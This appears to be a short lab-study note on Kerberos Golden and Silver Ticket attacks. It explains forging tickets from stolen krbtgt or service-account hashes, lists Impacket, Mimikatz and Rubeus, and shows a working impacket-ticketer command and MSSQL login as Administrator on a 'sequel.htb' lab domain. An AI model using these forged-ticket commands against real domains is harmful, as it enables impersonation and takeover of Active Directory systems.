Golden/Silver Ticket Attack

Overview

The ticket attack abuses the service account's password hash.

Golden Ticket Attack

The Golden Ticket Attack abuses the krbtgt account's password hash to issue the Kerberos ticket-granting tickets as the KDC to access the resources.

After the adversary gets the account krbtgt's password hash, it can

• create a valid Kerberos TGT for any user in the domain and

• manipulate that user’s PAC to gain additional privileges.

Tools

Impacket

Rubues

Mimikatz

Labs

• Forest

Silver Ticket Attack

Attackers can mint service-granting tickets without communicating to the KDC, if they get the password hash for the service account.

Silver Ticket AttackNetwrix

Tools

Impacket

With a service account's password hash, we can mint a service-granting ticket without interacting with the DC.

$ impacket-ticketer -nthash <password-hash> -domain-sid <domain-sid> -domain sequel.htb -dc-ip escape -spn MSSQL/DC.SEQUEL.HTB Administrator
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sequel.htb/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

We can use the saved ccache file to authenticate to the service later.

$ export KRB5CCNAME=Administrator.ccache
$ impacket-mssqlclient -k dc.sequel.htb
...
SQL> select suser_name()
                       
--------------------   
sequel\Administrator 

Rubues

Mimikatz

Labs

• Escape